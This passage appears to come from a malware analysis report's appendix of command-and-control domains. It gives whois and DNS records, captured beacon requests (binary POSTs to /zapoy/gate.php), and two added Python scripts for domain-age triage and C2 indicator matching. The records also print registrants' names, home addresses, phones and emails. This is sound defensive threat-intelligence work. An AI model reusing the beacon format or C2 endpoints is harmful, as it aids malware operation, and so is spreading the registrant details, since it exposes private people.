Whois Server: whois.godaddy.com 
Referral URL: http[:]//www[.]godaddy.com 
Name Server: NS1.WESTSERVERS.NET 
Name Server: NS2.WESTSERVERS.NET 

Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited 
Status: clientRenewProhibited https[:]//icann.org/epp#clientRenewProhibited 
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Status: clientUpdateProhibited https[:]//icann.org/epp#clientUpdateProhibited 
Updated Date: 03-feb-2016 
Creation Date: 02-feb-2016 
Expiration Date: 02-feb-2018 

>>> Last update of whois database: Mon, 16 Jan 2017 12:57:44 GMT <<<

Queried whois.godaddy.com with "cderlearn.com"... 

Domain Name: cderlearn.com 

Registry Domain ID: 1999727892_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.godaddy.com 

Registrar URL: http[:]//www[.]godaddy.com 

Update Date: 2016-02-02T20:49:41Z 

Creation Date: 2016-02-02T20:49:41Z 

Registrar Registration Expiration Date: 2018-02-02T20:49:41Z 

Registrar: GoDaddy.com, LLC 

Registrar IANA ID: 146 

Registrar Abuse Contact Email: abuse@godaddy.com 
Registrar Abuse Contact Phone: +1.4806242505 

Domain Status: clientTransferProhibited http[:]//www[.]icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http[:]//www[.]icann.org/epp#clientUpdateProhibited 
Domain Status: clientRenewProhibited http[:]//www[.]icann.org/epp#clientRenewProhibited 
Domain Status: clientDeleteProhibited http[:]//www[.]icann.org/epp#clientDeleteProhibited 
Registry Registrant ID: Not Available From Registry 
Registrant Name: Craig Audley 
Registrant Organization: 

Registrant Street: 1 carpenters cottages 
Registrant City: holt 
Registrant State/Province: norfolk 
Registrant Postal Code: nr256sa 
Registrant Country: UK 
Registrant Phone: +44.1263710645 
Registrant Phone Ext: 

Registrant Fax: 

Registrant Fax Ext: 

Registrant Email: craigaudley@gmail.com 
Registry Admin ID: Not Available From Registry 
Admin Name: Craig Audley 
Admin Organization: 

Admin Street: 1 carpenters cottages 

Admin City: holt 

Admin State/Province: norfolk 

Admin Postal Code: nr256sa 

Admin Country: UK 

Admin Phone: +44.1263710645 

Admin Phone Ext: 

Admin Fax: 

Admin Fax Ext: 

Admin Email: craigaudley@gmail.com 
Registry Tech ID: Not Available From Registry 
Tech Name: Craig Audley 
Tech Organization: 

Tech Street: 1 carpenters cottages 
Tech City: holt 
Tech State/Province: norfolk
Tech Postal Code: nr256sa 
Tech Country: UK 
Tech Phone: +44.1263710645 
Tech Phone Ext: 

Tech Fax: 

Tech Fax Ext: 

Tech Email: craigaudley@gmail.com 
Name Server: NS1.WESTSERVERS.NET 
Name Server: NS2.WESTSERVERS.NET 
DNSSEC: unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
>>> Last update of WHOIS database: 2017-01-16T12:00:00Z <<<

Network Whois record 

Queried secure.mpcustomer.com with "209.236.67.159"... 

Queried whois.arin.net with "n 209.236.67.159"... 

NetRange: 209.236.64.0 - 209.236.79.255 

CIDR: 209.236.64.0/20 

NetName: WH-NET-209-236-64-0-1 

NetHandle: NET-209-236-64-0-1 

Parent: NET209 (NET-209-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS29854 

Organization: WestHost, Inc. (WESTHO) 

RegDate: 2010-02-25 

Updated: 2014-01-02 

Ref: https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1 

OrgName: WestHost, Inc. 

OrgId: WESTHO

Address: 517 W 100 N STE 225 

City: Providence 

StateProv: UT 

PostalCode: 84332 
Country: US 

RegDate: 2000-03-13 

Updated: 2016-09-30 

Comment: Please report abuse issues to abuse@uk2group.com 

Ref: https[:]//whois.arin.net/rest/org/WESTHO 

ReferralServer: rwhois://secure.mpcustomer.com:4321 

OrgNOCHandle: NOC12189-ARIN 

OrgNOCName: NOC 

OrgNOCPhone: +1-435-755-3433 

OrgNOCEmail: noc@uk2group.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN 
OrgTechHandle: WESTH1-ARIN 
OrgTechName: WestHost Inc 
OrgTechPhone: +1-435-755-3433 
OrgTechEmail: noc@uk2group.com 

OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

OrgAbuseHandle: WESTH2-ARIN 

OrgAbuseName: WestHost Abuse 

OrgAbusePhone: +1-435-755-3433 

OrgAbuseEmail: abuse@uk2group.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

RTechHandle: WESTH1-ARIN 

RTechName: WestHost Inc 

RTechPhone: +1-435-755-3433 

RTechEmail: noc@uk2group.com 

RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 
RNOCHandle: WESTH1-ARIN 
RNOCName: WestHost Inc 
RNOCPhone: +1-435-755-3433 
RNOCEmail: noc@uk2group.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN 

RAbuseHandle: WESTH2-ARIN 

RAbuseName: WestHost Abuse 

RAbusePhone: +1-435-755-3433 

RAbuseEmail: abuse@uk2group.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN 

DNS records 
name class type data time to live
cderlearn.com IN MX 
preference: 0 

exchange: cderlearn.com 

14400s (04:00:00) 

cderlearn.com IN SOA 
server: ns1.westservers.net

email: hostmaster@westservers.net 

serial: 2016020303 

refresh: 86400 
retry: 7200 

expire: 604800 
minimum ttl: 600 


86400s (1.00:00:00) 

cderlearn.com IN NS ns2.westservers.net 86400s (1.00:00:00) 

cderlearn.com IN NS ns1.westservers.net 86400s (1.00:00:00) 

cderlearn.com IN A 209.236.67.159 14400s (04:00:00) 

159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00) 

67.236.209.in-addr.arpa IN SOA 

server: ns1.westdc.net 

email: hostmaster@westdc.net 

serial: 2010074157 

refresh: 28800 

retry: 7200 

expire: 604800 

minimum ttl: 600 

86400s (1.00:00:00) 


67.236.209.in-addr.arpa IN NS ns3.westdc.net 86400s (1.00:00:00)

67.236.209.in-addr.arpa IN NS ns1.westdc.net 86400s (1.00:00:00)

67.236.209.in-addr.arpa IN NS ns2.westdc.net 86400s (1.00:00:00)


Relationships 


(D) cderlearn.com Characterized_By (W) Address lookup 


(D) cderlearn.com Connected_From (F) 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 (ae7e3)

(D) cderlearn.com Related_To (H) POST /search.cfm HTT

(D) cderlearn.com Related_To (H) POST /search.cfm HTT

(D) cderlearn.com Related_To (I) 209.236.67.159


Description 

Identified Command and Control Location.


wilcarobbe.com 

Ports 

• 80 

HTTP Sessions 

• POST /zapoy/gate.php HTTP/1.0
Host: wilcarobbe.com 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.qO.,..4.v.,8 ..Y.u. 

X..3S*3.S..%?.".) >... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 
lookup failed wilcarobbe.com

A temporary error occurred during the lookup. Trying again may succeed. 

Domain Whois record 

Queried whois.internic.net with "dom wilcarobbe.com"... 

Domain Name: WILCAROBBE.COM 
Registrar: BIZCN.COM, INC. 

Sponsoring Registrar IANA ID: 471 
Whois Server: whois.bizcn.com 
Referral URL: http[:]//www[.]bizcn.com 
Name Server: NS0.XTREMEWEB.DE
Name Server: NS3.XTREMEWEB.DE 

Status: clientDeleteProhibited https[:]//icann.org/epp#clientDeleteProhibited 
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Updated Date: 07-nov-2016 
Creation Date: 11-apr-2016 
Expiration Date: 11-apr-2017 

>>> Last update of whois database: Mon, 16 Jan 2017 13:05:45 GMT <<<

Queried whois.bizcn.com with "wilcarobbe.com"... 

Domain name: wilcarobbe.com 

Registry Domain ID: 2020708223_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.bizcn.com 

Registrar URL: http[:]//www[.]bizcn.com 

Updated Date: 2016-04-11T17:42:02Z 

Creation Date: 2016-04-11T17:42:00Z 

Registrar Registration Expiration Date: 2017-04-11T17:42:00Z 

Registrar: Bizcn.com,Inc. 

Registrar IANA ID: 471 

Registrar Abuse Contact Email: abuse@bizcn.com 
Registrar Abuse Contact Phone: +86.5922577888 
Reseller: Cnobin Technology HK Limited 

Domain Status: clientDeleteProhibited (http[:]//www[.]icann.org/epp#clientDeleteProhibited) 
Domain Status: clientTransferProhibited (http[:]//www[.]icann.org/epp#clientTransferProhibited) 
Registry Registrant ID: 

Registrant Name: Arsen Ramzanov 
Registrant Organization: NA 
Registrant Street: Zlatoustskaya str, 14 fl 2 
Registrant City: Sadovoye 
Registrant State/Province: Groznenskaya obl
Registrant Postal Code: 366041 
Registrant Country: ru 
Registrant Phone: +7.4959795033 
Registrant Phone Ext: 

Registrant Fax: +7.4959795033 
Registrant Fax Ext: 

Registrant Email: arsen.ramzanov@yandex.ru 
Registry Admin ID: 

Admin Name: Arsen Ramzanov 

Admin Organization: NA 

Admin Street: Zlatoustskaya str, 14 fl 2 

Admin City: Sadovoye 

Admin State/Province: Groznenskaya obl

Admin Postal Code: 366041 

Admin Country: ru 

Admin Phone: +7.4959795033 

Admin Phone Ext: 

Admin Fax: +7.4959795033 
Admin Fax Ext: 

Admin Email: arsen.ramzanov@yandex.ru 
Registry Tech ID: 

Tech Name: Arsen Ramzanov 

Tech Organization: NA 

Tech Street: Zlatoustskaya str, 14 fl 2 

Tech City: Sadovoye 

Tech State/Province: Groznenskaya obl

Tech Postal Code: 366041 

Tech Country: ru 

Tech Phone: +7.4959795033 

Tech Phone Ext: 

Tech Fax: +7.4959795033 
Tech Fax Ext: 
Tech Email: arsen.ramzanov@yandex.ru
Name Server: ns0.xtremeweb.de
Name Server: ns3.xtremeweb.de 
DNSSEC: unsignedDelegation 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
>>> Last update of WHOIS database: 2017-01-16T13:06:08Z <<<

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for wilcarobbe.com returned an error from the server: ServerFailure 
No records to display 

Relationships 

(D) wilcarobbe.com Characterized_By (W) Address lookup

(D) wilcarobbe.com Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) wilcarobbe.com Related_To (H) POST /zapoy/gate.php

(D) wilcarobbe.com Related_To (P) 80


Description 

Identified Command and Control Location. 

one2shoppee.com 

Ports 

• 80 

Whois 

Address lookup 

canonical name one2shoppee.com. 
aliases 

addresses 2604:5800:0:23::8 
69.195.129.72 

Domain Whois record 

Queried whois.internic.net with "dom one2shoppee.com"...

Domain Name: ONE2SHOPPEE.COM 
Registrar: DYNADOT, LLC 
Sponsoring Registrar IANA ID: 472 
Whois Server: whois.dynadot.com 
Referral URL: http[:]//www[.]dynadot.com 
Name Server: NS1.DYNADOT.COM 
Name Server: NS2.DYNADOT.COM 

Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProhibited
Updated Date: 05-jan-2017 
Creation Date: 05-jan-2017 
Expiration Date: 05-jan-2018 

>>> Last update of whois database: Mon, 16 Jan 2017 13:01:15 GMT <<<

Queried whois.dynadot.com with "one2shoppee.com"... 

Domain Name: ONE2SHOPPEE.COM 

Registry Domain ID: 2087544116_DOMAIN_COM-VRSN 

Registrar WHOIS Server: whois.dynadot.com 

Registrar URL: http[:]//www[.]dynadot.com 

Updated Date: 2017-01-05T10:40:34.0Z 

Creation Date: 2017-01-05T10:40:32.0Z 

Registrar Registration Expiration Date: 2018-01-05T10:40:32.0Z 

Registrar: DYNADOT LLC 

Registrar IANA ID: 472 

Registrar Abuse Contact Email: abuse@dynadot.com 
Registrar Abuse Contact Phone: +1.6502620100 
Domain Status: clientTransferProhibited 
Registry Registrant ID: 

Registrant Name: Authorized Representative 
Registrant Organization: Kleissner & Associates s.r.o. 

Registrant Street: Na strzi 1702/65 
Registrant City: Praha 
Registrant Postal Code: 140 00 
Registrant Country: CZ
Registrant Phone: +420.00000000 
Registrant Email: domains@virustracker.info
Registry Admin ID: 

Admin Name: Authorized Representative 
Admin Organization: Kleissner & Associates s.r.o. 

Admin Street: Na strzi 1702/65 

Admin City: Praha 

Admin Postal Code: 140 00 

Admin Country: CZ 

Admin Phone: +420.00000000 

Admin Email: domains@virustracker.info 

Registry Tech ID: 

Tech Name: Authorized Representative 
Tech Organization: Kleissner & Associates s.r.o. 

Tech Street: Na strzi 1702/65 

Tech City: Praha 

Tech Postal Code: 140 00 

Tech Country: CZ 

Tech Phone: +420.00000000 

Tech Email: domains@virustracker.info 

Name Server: ns1.dynadot.com 

Name Server: ns2.dynadot.com 

DNSSEC: unsigned 

URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/ 
>>> Last update of WHOIS database: 2017-01-16 04:56:51 -0800 <<<

Network Whois record 

Whois query for 69.195.129.72 failed: TimedOut 
Queried whois.arin.net with "n 69.195.129.72"... 

NetRange: 69.195.128.0 - 69.195.159.255 

CIDR: 69.195.128.0/19 

NetName: JOESDC-01 

NetHandle: NET-69-195-128-0-1 

Parent: NET69 (NET-69-0-0-0-0) 

NetType: Direct Allocation 

OriginAS: AS19969 

Organization: Joe's Datacenter, LLC (JOESD) 

RegDate: 2010-07-09 

Updated: 2015-03-06 

Ref: https[:]//whois.arin.net/rest/net/NET-69-195-128-0-1 

OrgName: Joe's Datacenter, LLC 

OrgId: JOESD

Address: 1325 Tracy Ave 

City: Kansas City 

StateProv: MO 

PostalCode: 64106 

Country: US 

RegDate: 2009-08-21 

Updated: 2014-06-28 

Ref: https[:]//whois.arin.net/rest/org/JOESD 

ReferralServer: rwhois://support.joesdatacenter.com:4321 

OrgAbuseHandle: NAA25-ARIN 

OrgAbuseName: Network Abuse Administrator 

OrgAbusePhone: +1-816-726-7615 

OrgAbuseEmail: security@joesdatacenter.com 

OrgAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN 

OrgTechHandle: JPM84-ARIN 

OrgTechName: Morgan, Joe Patrick 

OrgTechPhone: +1-816-726-7615 

OrgTechEmail: joe@joesdatacenter.com

OrgTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

OrgNOCHandle: JPM84-ARIN 

OrgNOCName: Morgan, Joe Patrick 

OrgNOCPhone: +1-816-726-7615 

OrgNOCEmail: joe@joesdatacenter.com 

OrgNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

RAbuseHandle: NAA25-ARIN 

RAbuseName: Network Abuse Administrator 

RAbusePhone: +1-816-726-7615 

RAbuseEmail: security@joesdatacenter.com 

RAbuseRef: https[:]//whois.arin.net/rest/poc/NAA25-ARIN 
RNOCHandle: JPM84-ARIN


RNOCName: Morgan, Joe Patrick 

RNOCPhone: +1-816-726-7615 

RNOCEmail: joe@joesdatacenter.com 

RNOCRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

RTechHandle: JPM84-ARIN 

RTechName: Morgan, Joe Patrick 

RTechPhone: +1-816-726-7615 

RTechEmail: joe@joesdatacenter.com 

RTechRef: https[:]//whois.arin.net/rest/poc/JPM84-ARIN 

DNS records 

DNS query for 72.129.195.69.in-addr.arpa returned an error from the server: NameError 

DNS query for 8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.2.0.0.0.0.0.0.0.0.8.5.4.0.6.2.ip6.arpa returned an error from the server: NameError 

name class type data time to live 

one2shoppee.com IN SOA 

server: ns1.dynadot.com

email: hostmaster@one2shoppee.com 

serial: 1484571411 

refresh: 16384 

retry: 2048 

expire: 1048576 

minimum ttl: 2560 


2560s (00:42:40) 

one2shoppee.com IN NS ns1.dynadot.com 10800s (03:00:00)

one2shoppee.com IN NS ns2.dynadot.com 10800s (03:00:00)

one2shoppee.com IN AAAA 2604:5800:0:23::8 10800s (03:00:00)

one2shoppee.com IN A 69.195.129.72 10800s (03:00:00)


Relationships 

(D) one2shoppee.com Characterized_By (W) Address lookup 

(D) one2shoppee.com Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) one2shoppee.com Related_To (P) 80 


Description 

Identified Command and Control Location. 
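A domain-age triage over the whois records above, added here as an example; it is not code from the DHS report or its MIFR tooling. The creation dates and registrars are transcribed from the records on this page, the observation time is assumed from the "Last update of whois database" stamps (all between 12:55 and 13:06 UTC on 16 Jan 2017), and the 90-day threshold is an arbitrary triage cut-off. Age is only a triage signal, not a verdict: directinvesting.com, registered in 1997 to a named US business, is listed as a command and control location just the same.

```python
"""Rank the domains on this page by registration age at the time of lookup."""
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Assumed observation time, taken from the whois "Last update" stamps on this page.
OBSERVED_AT = datetime(2017, 1, 16, 13, 0, tzinfo=timezone.utc)

# Date spellings that occur in the records on this page: the thin internic
# record ("04-aug-1997"), registrar records ("2016-02-02T20:49:41Z" and
# Dynadot's "2017-01-05T10:40:32.0Z") and RU-CENTER ("2009.03.13").
_DATE_FORMATS = ("%d-%b-%Y", "%Y-%m-%dT%H:%M:%SZ", "%Y-%m-%dT%H:%M:%S.%fZ", "%Y.%m.%d")


def parse_whois_date(text: str) -> datetime:
    """Parse any of the whois date spellings above into an aware UTC datetime."""
    for fmt in _DATE_FORMATS:
        try:
            return datetime.strptime(text.strip(), fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError(f"unrecognised whois date: {text!r}")


def creation_date(record: str) -> Optional[datetime]:
    """Find the registration date in a raw domain whois record.

    Registrar and internic records label it "Creation Date:"; RU-CENTER uses
    "created:". The first match wins, so a "created:" line inside an attached
    RIPE object lower down cannot override the domain's own date.
    """
    for line in record.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() in ("creation date", "created"):
            return parse_whois_date(value)
    return None


def domain_age_days(record: str, observed_at: datetime = OBSERVED_AT) -> Optional[int]:
    """Whole days between registration and observation, or None if no date was found."""
    created = creation_date(record)
    return None if created is None else (observed_at - created).days


def rank_by_age(records: Dict[str, str],
                observed_at: datetime = OBSERVED_AT) -> List[Tuple[str, Optional[int]]]:
    """Youngest domain first; records without a parseable date sort last."""
    ages = [(name, domain_age_days(rec, observed_at)) for name, rec in records.items()]
    return sorted(ages, key=lambda item: (item[1] is None, item[1] or 0))


def young_domains(records: Dict[str, str], max_days: int = 90,
                  observed_at: datetime = OBSERVED_AT) -> List[str]:
    """Domains registered within max_days of the observation time."""
    return [name for name, age in rank_by_age(records, observed_at)
            if age is not None and age <= max_days]


# Constructed, abridged copies of the domain whois records shown on this page.
RECORDS = {
    "directinvesting.com": "Domain Name: DIRECTINVESTING.COM\nRegistrar: NETWORK SOLUTIONS, LLC.\n"
                           "Creation Date: 04-aug-1997\nExpiration Date: 03-aug-2021\n",
    "cderlearn.com": "Domain Name: cderlearn.com\nRegistrar: GoDaddy.com, LLC\n"
                     "Creation Date: 2016-02-02T20:49:41Z\n",
    "wilcarobbe.com": "Domain name: wilcarobbe.com\nRegistrar: Bizcn.com,Inc.\n"
                      "Creation Date: 2016-04-11T17:42:00Z\n",
    "one2shoppee.com": "Domain Name: ONE2SHOPPEE.COM\nRegistrar: DYNADOT LLC\n"
                       "Creation Date: 2017-01-05T10:40:32.0Z\n",
    "reduct.ru": "domain: REDUCT.RU\nregistrar: RU-CENTER-RU\ncreated: 2009.03.13\n"
                 "paid-till: 2017.03.13\n",
    "ritsoperrol.ru": "No entries found for the selected source(s).\n",
}

if __name__ == "__main__":
    for name, age in rank_by_age(RECORDS):
        print(f"{name:24s} {'no record' if age is None else f'{age} days old'}")
```

one2shoppee.com comes out eleven days old at lookup time and is the only domain under the 90-day cut-off; the two .ru C2 domains have no whois record at all, which is its own signal and is why missing dates are kept in the ranking rather than dropped.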


ritsoperrol.ru 

Ports 

• 80 

HTTP Sessions 

• POST /zapoy/gate.php HTTP/1.0 
Host: ritsoperrol.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v.,8 ..Y.u. 

X..3S*3.S..%?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 

lookup failed ritsoperrol.ru 

A temporary error occurred during the lookup. Trying again may succeed. 

Domain Whois record 

Queried whois.nic.ru with "ritsoperrol.ru"... 

No entries found for the selected source(s). 
>>> Last update of WHOIS database: 2017.01.16T13:04:09Z <<<

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for ritsoperrol.ru returned an error from the server: ServerFailure 
No records to display 

Relationships 

(D) ritsoperrol.ru Characterized_By (W) Address lookup 

(D) ritsoperrol.ru Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) ritsoperrol.ru Related_To (P) 80 

(D) ritsoperrol.ru Related_To (H) POST /zapoy/gate.php

Description 

Identified Command and Control Location. 

littjohnwilhap.ru 

Ports 

• 80 

HTTP Sessions 

• POST /zapoy/gate.php HTTP/1.0 
Host: littjohnwilhap.ru 
Accept: */* 

Accept-Encoding: identity, *;q=0 
Accept-Language: en-US 
Content-Length: 196 
Content-Type: application/octet-stream 
Connection: close 
Content-Encoding: binary 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 
3.5.21022) 

...[xXP.YG.4...d...S.q0....4.v.,8 ..Y.u. 

X..3S*3.S..%?.".).>... 

>V....H...;4.OGf.'L..fB.N#.v[H.b_.{..w.j5... 

Whois 

Address lookup 

lookup failed littjohnwilhap.ru 

Could not find an IP address for this domain name. 

Domain Whois record 

Queried whois.nic.ru with "littjohnwilhap.ru"... 

No entries found for the selected source(s). 

>>> Last update of WHOIS database: 2017.01.16T13:05:16Z <<<

Network Whois record 

Don't have an IP address for which to get a record 
DNS records 

DNS query for littjohnwilhap.ru returned an error from the server: NameError 
No records to display 

Relationships 

(D) littjohnwilhap.ru Characterized_By (W) Address lookup 

(D) littjohnwilhap.ru Connected_From (F) 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5 (617ba)

(D) littjohnwilhap.ru Related_To (H) POST /zapoy/gate.php 

(D) littjohnwilhap.ru Related_To (P) 80 

Description 
Identified Command and Control Location.
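Detection logic run over the captured sessions above, added here as an example; it is not code from the DHS report. The host, path and user-agent indicators are transcribed from the sessions on this page. The substring b73d479e is simply what the five /lexicon/index.cfm and /search.cfm parameter values shown on this page have in common, so it is scored as supporting evidence only, and the same goes for the user-agent string, which was a common browser string of its period and should never be alerted on alone. The sample requests are constructed copies of two sessions shown above plus a benign request that shares only the user-agent.

```python
"""Triage captured HTTP requests against the C2 indicators listed on this page."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Indicator sets transcribed from the sessions and domain entries on this page.
C2_HOSTS = {
    "private.directinvesting.com",
    "www.cderlearn.com",
    "wilcarobbe.com",
    "ritsoperrol.ru",
    "littjohnwilhap.ru",
}
C2_PATHS = {"/lexicon/index.cfm", "/search.cfm", "/zapoy/gate.php"}
C2_USER_AGENT = (
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
    ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
)
# Present in every query-string and form value captured on this page
# (149a8d6adb73d479e66c6, 80aaeb73d479e66c6, 876b73d479e66c6, 8816db73d479e8e35,
# a804b4b73d479eebea). Its meaning is not established; supporting indicator only.
SHARED_TOKEN = "b73d479e"


@dataclass
class HttpRequest:
    method: str
    target: str
    version: str
    headers: Dict[str, str]
    body: str

    @property
    def path(self) -> str:
        return self.target.split("?", 1)[0]


def parse_request(raw: str) -> HttpRequest:
    """Split one raw request into request line, lower-cased headers and body."""
    text = raw.replace("\r\n", "\n").lstrip("\n")
    head, _, body = text.partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, target, version = lines[0].split()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, target, version, headers, body.strip("\n"))


def score_request(req: HttpRequest) -> Tuple[str, List[str]]:
    """Return (verdict, reasons).

    A listed host or path is enough for "high". The user-agent string and the
    shared token only reach "low" on their own, because that IE6/.NET string
    was common in legitimate traffic of the period.
    """
    strong: List[str] = []
    weak: List[str] = []
    host = req.headers.get("host", "").replace("[.]", ".").lower()
    if host in C2_HOSTS:
        strong.append(f"host {host} is a listed C2 location")
    if req.path in C2_PATHS:
        strong.append(f"path {req.path} matches a captured C2 session")
    if (req.path == "/zapoy/gate.php" and req.method == "POST"
            and req.version == "HTTP/1.0"
            and req.headers.get("content-type") == "application/octet-stream"):
        strong.append("binary POST to /zapoy/gate.php over HTTP/1.0")
    if req.headers.get("user-agent") == C2_USER_AGENT:
        weak.append("user-agent equals the captured sessions' string")
    if SHARED_TOKEN in req.target or SHARED_TOKEN in req.body:
        weak.append(f"parameter value contains {SHARED_TOKEN}")
    if strong:
        return "high", strong + weak
    if weak:
        return "low", weak
    return "none", []


# Constructed samples: the first two copy sessions shown on this page, the
# third is a benign request that only shares the user-agent string.
SAMPLE_GET = """GET /lexicon/index.cfm?dq=d9487&pg=149a8d6adb73d479e66c6 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: private.directinvesting.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
"""
SAMPLE_POST = """POST /zapoy/gate.php HTTP/1.0
Host: wilcarobbe.com
Accept: */*
Content-Length: 196
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

<196 opaque bytes stand in for the binary body>"""
SAMPLE_BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
"""


def triage(raw_requests: List[str]) -> List[Tuple[str, str]]:
    """Map each raw request to (host header, verdict)."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        out.append((req.headers.get("host", ""), score_request(req)[0]))
    return out


if __name__ == "__main__":
    for raw in (SAMPLE_GET, SAMPLE_POST, SAMPLE_BENIGN):
        req = parse_request(raw)
        verdict, reasons = score_request(req)
        print(f"{req.method} {req.path} -> {verdict}: {'; '.join(reasons)}")
```

On real proxy logs the Host header is what to key on first: the .ru domains in this appendix did not resolve at lookup time, so a DNS-based block list would have missed them while the Host header and the /zapoy/gate.php path still match.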


insta.reduct.ru 

Ports 

• 80 

Whois 

Address lookup 

canonical name insta.reduct.ru. 
aliases 

addresses 146.185.161.126 


Domain Whois record 

Queried whois.nic.ru with "reduct.ru"... 

domain: REDUCT.RU 

nserver: ns1.spaceweb.ru 

nserver: ns2.spaceweb.ru 

state: REGISTERED, DELEGATED 

person: Private person 

admin-contact:https[:]//www[.]nic.ru/cgi/whois_webmail.cgi?domain=REDUCT.RU 

registrar: RU-CENTER-RU 

created: 2009.03.13 

paid-till: 2017.03.13 

source: RU-CENTER 

>>> Last update of WHOIS database: 2017.01.16T13:00:25Z <<<


Network Whois record 

Queried whois.ripe.net with "-B 146.185.161.126"... 

% Information related to '146.185.160.0 - 146.185.167.255' 

% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com' 

inetnum: 146.185.160.0 - 146.185.167.255 

netname: DIGITALOCEAN-AMS-3 

descr: Digital Ocean, Inc. 

country: NL 

admin-c: PT7353-RIPE 

tech-c: PT7353-RIPE 

status: ASSIGNED PA 

mnt-by: digitalocean 

mnt-lower: digitalocean 

mnt-routes: digitalocean 

created: 2013-09-17T17:13:25Z 

last-modified: 2015-11-20T14:45:22Z 

source: RIPE 

person: Network Operations 

address: 101 Ave of the Americas, 10th Floor, New York, NY 10013 

phone: +13478756044 

nic-hdl: PT7353-RIPE 

mnt-by: digitalocean 

created: 2015-03-11T16:37:07Z 

last-modified: 2015-11-19T15:57:21Z

source: RIPE 

e-mail: noc@digitalocean.com 

org: ORG-DOI2-RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (WAGYU) 
DNS records 

DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError 
name class type data time to live 
insta.reduct.ru IN A 146.185.161.126 600s(00:10:00) 

reduct.ru IN SOA 

server: ns1.spaceweb.ru 

email: dns1@sweb.ru 

serial: 2010022878 

refresh: 28800 
retry: 7200 

expire: 604800 
minimum ttl: 600 

600s(00:10:00) 

reduct.ru IN A 77.222.42.238 600s(00:10:00) 

reduct.ru IN NS ns3.spaceweb.pro 600s(00:10:00) 

reduct.ru IN NS ns1.spaceweb.ru 600s(00:10:00) 
reduct.ru IN NS ns2.spaceweb.ru 600s(00:10:00)

